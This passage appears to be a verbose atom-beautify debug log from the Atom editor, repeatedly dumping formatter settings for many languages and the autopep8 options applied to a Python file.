keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, e4x=true, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_char= , indent_with_tabs=false, indent_preamble=false, always_look_for_split_braces=true, always_look_for_split_brackets=false, remove_trailing_whitespace=false, align_columns_in_environments=[tabular, matrix, bmatrix, pmatrix], disabled=false, default_beautifier=Latex Beautify, beautify_on_save=false, indent_size=2, indent_char= , newline_between_rules=true, preserve_newlines=false, wrap_line_length=0, indent_comments=true, force_indentation=false, convert_quotes=none, align_assignments=false, no_lead_zero=false, configPath=, predefinedConfig=csscomb, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, end_of_line=System Default, disabled=false, default_beautifier=Lua beautifier, beautify_on_save=false, gfm=true, yaml=true, commonmark=false, disabled=false, default_beautifier=Tidy Markdown, beautify_on_save=false, indent_size=2, indent_char= , syntax=html, indent_inner_html=false, brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], disabled=false, default_beautifier=Marko Beautifier, beautify_on_save=false, indent_inner_html=false, indent_size=2, indent_char= , brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, indent_size=2, indent_char= , indent_with_tabs=false, dontJoinCurlyBracet=true, disabled=false, default_beautifier=Nginx Beautify, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, disabled=false, default_beautifier=ocp-indent, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, perltidy_profile=, disabled=false, default_beautifier=Perltidy, beautify_on_save=false, cs_fixer_path=, cs_fixer_version=2, cs_fixer_config_file=, fixers=, level=, rules=, allow_risky=no, phpcbf_path=, phpcbf_version=2, standard=PEAR, disabled=false, default_beautifier=PHP-CS-Fixer, beautify_on_save=false, disabled=false, default_beautifier=puppet-lint, beautify_on_save=false, max_line_length=79, indent_size=4, ignore=[E24], formater=autopep8, style_config=pep8, sort_imports=false, multi_line_output=Hanging Grid Grouped, disabled=false, default_beautifier=autopep8, beautify_on_save=false, indent_size=2, disabled=false, default_beautifier=formatR, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , rubocop_path=, disabled=false, default_beautifier=Rubocop, beautify_on_save=false, rustfmt_path=, disabled=false, default_beautifier=rustfmt, beautify_on_save=false, disabled=false, default_beautifier=SassConvert, beautify_on_save=false, indent_size=2, indent_char= , newline_between_rules=true, preserve_newlines=false, wrap_line_length=0, indent_comments=true, force_indentation=false, convert_quotes=none, align_assignments=false, no_lead_zero=false, configPath=, predefinedConfig=csscomb, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, keywords=upper, identifiers=unchanged, disabled=false, default_beautifier=sqlformat, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , newline_between_rules=true, preserve_newlines=false, wrap_line_length=0, indent_comments=true, force_indentation=false, convert_quotes=none, align_assignments=false, no_lead_zero=false, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , indent_with_tabs=false, preserve_newlines=true, space_in_paren=false, space_after_anon_function=false, break_chained_methods=false, wrap_line_length=250, end_with_comma=false, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=TypeScript Formatter, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=250, end_with_newline=false, end_with_comma=false, end_of_line=System Default, indent_inner_html=false, indent_scripts=normal, wrap_attributes=auto, wrap_attributes_indent_size=2, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], extra_liners=[head, body, /html], disabled=false, default_beautifier=Vue Beautifier, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_inner_html=false, indent_size=2, indent_char= , brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, padding=0, disabled=false, default_beautifier=align-yaml, beautify_on_save=false, , , , , , ,
2017-07-23T12:31:34.249Z - verbose: [beautifiers\index.coffee] true indent_size=1, indent_char= , indent_with_tabs=true
2017-07-23T12:31:34.249Z - verbose: [beautifiers\index.coffee] options python
2017-07-23T12:31:34.249Z - verbose: [beautifiers\index.coffee] options python indent_size=1, indent_char= , indent_with_tabs=true
2017-07-23T12:31:34.249Z - verbose: [beautifiers\index.coffee] true configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, indent_size=2, disabled=false, default_beautifier=beautysh, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, disabled=false, default_beautifier=cljfmt, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=coffee-fmt, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, disabled=false, default_beautifier=Crystal, beautify_on_save=false, indent_size=2, indent_char= , selector_separator_newline=false, newline_between_rules=true, preserve_newlines=false, wrap_line_length=0, end_with_newline=false, indent_comments=true, force_indentation=false, convert_quotes=none, align_assignments=false, no_lead_zero=false, configPath=, predefinedConfig=csscomb, disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=250, end_with_newline=false, end_with_comma=false, end_of_line=System Default, indent_inner_html=false, indent_scripts=normal, wrap_attributes=auto, wrap_attributes_indent_size=2, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], extra_liners=[head, body, /html], disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, disabled=false, default_beautifier=elm-format, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, disabled=false, default_beautifier=erl_tidy, beautify_on_save=false, indent_size=2, indent_char= , disabled=false, default_beautifier=Gherkin formatter, beautify_on_save=false, configPath=, disabled=false, default_beautifier=clang-format, beautify_on_save=false, disabled=false, default_beautifier=gofmt, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, emacs_path=, emacs_script_path=, disabled=false, default_beautifier=Fortran Beautifier, beautify_on_save=false, indent_inner_html=false, indent_size=2, indent_char= , brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, disabled=false, default_beautifier=stylish-haskell, beautify_on_save=false, indent_inner_html=false, indent_size=2, indent_char= , brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, indent_size=2, indent_char= , disabled=false, default_beautifier=Pug Beautify, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, e4x=true, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_char= , indent_with_tabs=false, indent_preamble=false, always_look_for_split_braces=true, always_look_for_split_brackets=false, remove_trailing_whitespace=false, align_columns_in_environments=[tabular, matrix, bmatrix, pmatrix], disabled=false, default_beautifier=Latex Beautify, beautify_on_save=false, indent_size=2, indent_char= , newline_between_rules=true, preserve_newlines=false, wrap_line_length=0, indent_comments=true, force_indentation=false, convert_quotes=none, align_assignments=false, no_lead_zero=false, configPath=, predefinedConfig=csscomb, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, end_of_line=System Default, disabled=false, default_beautifier=Lua beautifier, beautify_on_save=false, gfm=true, yaml=true, commonmark=false, disabled=false, default_beautifier=Tidy Markdown, beautify_on_save=false, indent_size=2, indent_char= , syntax=html, indent_inner_html=false, brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], disabled=false, default_beautifier=Marko Beautifier, beautify_on_save=false, indent_inner_html=false, indent_size=2, indent_char= , brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, indent_size=2, indent_char= , indent_with_tabs=false, dontJoinCurlyBracet=true, disabled=false, default_beautifier=Nginx Beautify, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, disabled=false, default_beautifier=ocp-indent, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, perltidy_profile=, disabled=false, default_beautifier=Perltidy, beautify_on_save=false, cs_fixer_path=, cs_fixer_version=2, cs_fixer_config_file=, fixers=, level=, rules=, allow_risky=no, phpcbf_path=, phpcbf_version=2, standard=PEAR, disabled=false, default_beautifier=PHP-CS-Fixer, beautify_on_save=false, disabled=false, default_beautifier=puppet-lint, beautify_on_save=false, max_line_length=79, indent_size=4, ignore=[E24], formater=autopep8, style_config=pep8, sort_imports=false, multi_line_output=Hanging Grid Grouped, disabled=false, default_beautifier=autopep8, beautify_on_save=false, indent_size=2, disabled=false, default_beautifier=formatR, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , rubocop_path=, disabled=false, default_beautifier=Rubocop, beautify_on_save=false, rustfmt_path=, disabled=false, default_beautifier=rustfmt, beautify_on_save=false, disabled=false, default_beautifier=SassConvert, beautify_on_save=false, indent_size=2, indent_char= , newline_between_rules=true, preserve_newlines=false, wrap_line_length=0, indent_comments=true, force_indentation=false, convert_quotes=none, align_assignments=false, no_lead_zero=false, configPath=, predefinedConfig=csscomb, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, keywords=upper, identifiers=unchanged, disabled=false, default_beautifier=sqlformat, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , newline_between_rules=true, preserve_newlines=false, wrap_line_length=0, indent_comments=true, force_indentation=false, convert_quotes=none, align_assignments=false, no_lead_zero=false, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , indent_with_tabs=false, preserve_newlines=true, space_in_paren=false, space_after_anon_function=false, break_chained_methods=false, wrap_line_length=250, end_with_comma=false, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=TypeScript Formatter, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=250, end_with_newline=false, end_with_comma=false, end_of_line=System Default, indent_inner_html=false, indent_scripts=normal, wrap_attributes=auto, wrap_attributes_indent_size=2, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], extra_liners=[head, body, /html], disabled=false, default_beautifier=Vue Beautifier, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_inner_html=false, indent_size=2, indent_char= , brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, padding=0, disabled=false, default_beautifier=align-yaml, beautify_on_save=false
2017-07-23T12:31:34.251Z - verbose: [beautifiers\index.coffee] options python max_line_length=79, indent_size=4, ignore=[E24], formater=autopep8, style_config=pep8, sort_imports=false, multi_line_output=Hanging Grid Grouped, disabled=false, default_beautifier=autopep8, beautify_on_save=false
2017-07-23T12:31:34.252Z - verbose: [beautifiers\index.coffee] options python max_line_length=79, indent_size=4, ignore=[E24], formater=autopep8, style_config=pep8, sort_imports=false, multi_line_output=Hanging Grid Grouped, disabled=false, default_beautifier=autopep8, beautify_on_save=false
2017-07-23T12:31:34.252Z - verbose: [beautifiers\index.coffee] true
2017-07-23T12:31:34.252Z - verbose: [beautifiers\index.coffee] options python
2017-07-23T12:31:34.252Z - verbose: [beautifiers\index.coffee] options python
2017-07-23T12:31:34.252Z - verbose: [beautifiers\index.coffee] true
2017-07-23T12:31:34.253Z - verbose: [beautifiers\index.coffee] options python
2017-07-23T12:31:34.253Z - verbose: [beautifiers\index.coffee] options python
2017-07-23T12:31:34.253Z - verbose: [beautifiers\index.coffee] true
2017-07-23T12:31:34.253Z - verbose: [beautifiers\index.coffee] options python
2017-07-23T12:31:34.253Z - verbose: [beautifiers\index.coffee] options python
2017-07-23T12:31:34.253Z - verbose: [beautifiers\index.coffee] true
2017-07-23T12:31:34.253Z - verbose: [beautifiers\index.coffee] options python
2017-07-23T12:31:34.253Z - verbose: [beautifiers\index.coffee] options python
2017-07-23T12:31:34.253Z - verbose: [beautifiers\index.coffee] true
2017-07-23T12:31:34.253Z - verbose: [beautifiers\index.coffee] options python
2017-07-23T12:31:34.253Z - verbose: [beautifiers\index.coffee] options python
2017-07-23T12:31:34.253Z - verbose: [beautifiers\index.coffee] true
2017-07-23T12:31:34.253Z - verbose: [beautifiers\index.coffee] options python
2017-07-23T12:31:34.253Z - verbose: [beautifiers\index.coffee] options python
2017-07-23T12:31:34.253Z - verbose: [beautifiers\index.coffee] true
2017-07-23T12:31:34.253Z - verbose: [beautifiers\index.coffee] options python
2017-07-23T12:31:34.253Z - verbose: [beautifiers\index.coffee] options python
2017-07-23T12:31:34.253Z - verbose: [beautifiers\index.coffee] Python name=Python, namespace=python, scope=[source.python], grammars=[Python], extensions=[py], type=integer, default=79, description=set maximum allowed line length, type=integer, default=null, minimum=0, description=Indentation size/length, type=array, default=[E24], type=string, description=do not fix these errors/warnings, type=string, default=autopep8, enum=[autopep8, yapf], description=formatter used by pybeautifier, type=string, default=pep8, description=formatting style used by yapf, type=boolean, default=false, description=sort imports (requires isort installed), type=string, default=Hanging Grid Grouped, enum=[Grid, Vertical, Hanging Indent, Vertical Hanging Indent, Hanging Grid, Hanging Grid Grouped, NOQA], description=defines how from imports wrap (requires isort installed)
2017-07-23T12:31:34.254Z - verbose: [beautifiers\index.coffee] language options: {
"indent_size": 4,
"indent_char": "\t",
"indent_with_tabs": true,
"max_line_length": 79,
"ignore": [
"E24"
],
"formater": "autopep8",
"style_config": "pep8",
"sort_imports": false,
"multi_line_output": "Hanging Grid Grouped",
"disabled": false,
"default_beautifier": "autopep8",
"beautify_on_save": false
}
2017-07-23T12:31:34.254Z - verbose: [beautifiers\index.coffee] Python C:\Users\xyz_MG\Desktop\XXXXXX\2017ncstisc\enc.py { indent_size: 4,
indent_char: '\t',
indent_with_tabs: true,
max_line_length: 79,
ignore: [ 'E24' ],
formater: 'autopep8',
style_config: 'pep8',
sort_imports: false,
multi_line_output: 'Hanging Grid Grouped',
disabled: false,
default_beautifier: 'autopep8',
beautify_on_save: false } indent_size=1, indent_char= , indent_with_tabs=true, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, indent_size=2, disabled=false, default_beautifier=beautysh, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, disabled=false, default_beautifier=cljfmt, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=coffee-fmt, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, disabled=false, default_beautifier=Crystal, beautify_on_save=false, indent_size=2, indent_char= , selector_separator_newline=false, newline_between_rules=true, preserve_newlines=false, wrap_line_length=0, end_with_newline=false, indent_comments=true, force_indentation=false, convert_quotes=none, align_assignments=false, no_lead_zero=false, configPath=, predefinedConfig=csscomb, disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=250, end_with_newline=false, end_with_comma=false, end_of_line=System Default, indent_inner_html=false, indent_scripts=normal, wrap_attributes=auto, wrap_attributes_indent_size=2, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], extra_liners=[head, body, /html], disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, disabled=false, default_beautifier=elm-format, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, disabled=false, default_beautifier=erl_tidy, beautify_on_save=false, indent_size=2, indent_char= , disabled=false, default_beautifier=Gherkin formatter, beautify_on_save=false, configPath=, disabled=false, default_beautifier=clang-format, beautify_on_save=false, disabled=false, default_beautifier=gofmt, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, emacs_path=, emacs_script_path=, disabled=false, default_beautifier=Fortran Beautifier, beautify_on_save=false, indent_inner_html=false, indent_size=2, indent_char= , brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, disabled=false, default_beautifier=stylish-haskell, beautify_on_save=false, indent_inner_html=false, indent_size=2, indent_char= , brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], 